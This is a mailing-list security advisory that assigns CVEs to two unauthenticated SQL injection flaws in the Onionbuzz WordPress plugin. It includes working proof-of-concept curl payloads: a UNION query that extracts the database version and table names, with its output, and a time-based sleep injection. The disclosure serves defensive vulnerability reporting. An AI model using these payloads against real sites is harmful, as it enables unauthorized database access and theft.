oss-sec mailing list archives
Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin
From: Eugene Kolo <eugene () eugenekolo com>
Date: Mon, 22 Jul 2019 23:04:25 -0400
Assigned CVE-2019-14230 and CVE-2019-14231. On Sat, Jul 20, 2019 at 6:35 PM Eugene Kolo <eugene () eugenekolo com> wrote:
Two unauthenticated/unprivileged SQL injection vulnerabilities in the Viral Quiz Maker - Onionbuzz WordPress plugin. Information =========== Affected Product: Viral Quiz Maker - OnionBuzz WordPress plugin Vendor Homepage: Onionbuzz.com Vulnerability Type: SQL Injection Discoverer: Eugene Kolodenker Date: July-20-2019 1) Description =========== Prior to v1.2.2, you could exploit the `points` parameter in the `ob_get_results` ajax nopriv handler due to there being no sanitization on the points argument. The points parameter is not sanitized prior to be used in a SQL query in getResultByPointsTrivia. This allows an unauthenticated/unprivileged user to perform a SQL injection attack capable of remote code execution and information disclosure. Proof of Concept (POC) ====================== ``` curl http://site/wp-admin/admin-ajax.php?action=ob_get_results --data "type=get_result&id=1&quiz_type=5&points=1 or 1=0 union all select 1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#" ``` And get back: ``` {"quiz_id":1,"points":"1 or 1=0 union all select 1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#","title":<DBVERSION>","description":"CHARACTER_SETS","featured_image":"<img src=\"1\">","image_caption":"1","is_image":1,"success":1} ``` 2) Description =========== Prior to v1.2.7, you could exploit the `id` parameter in the `set_count` ajax nopriv handler due to there being no sanitization on the id argument. The id parameter is not sanitized prior to be used in a SQL query in saveQuestionVote. This allows an unauthenticated/unprivileged user to perform a SQL injection attack capable of remote code execution and information disclosure. Proof of Concept (POC) ====================== ``` curl http://site/wp-admin/admin-ajax.php?type=set_count --data "action=ob_question_votes&id=1 or sleep(10);#" ```
Current thread:
- Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin Eugene Kolo (Jul 21)
- Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin Eugene Kolo (Jul 22)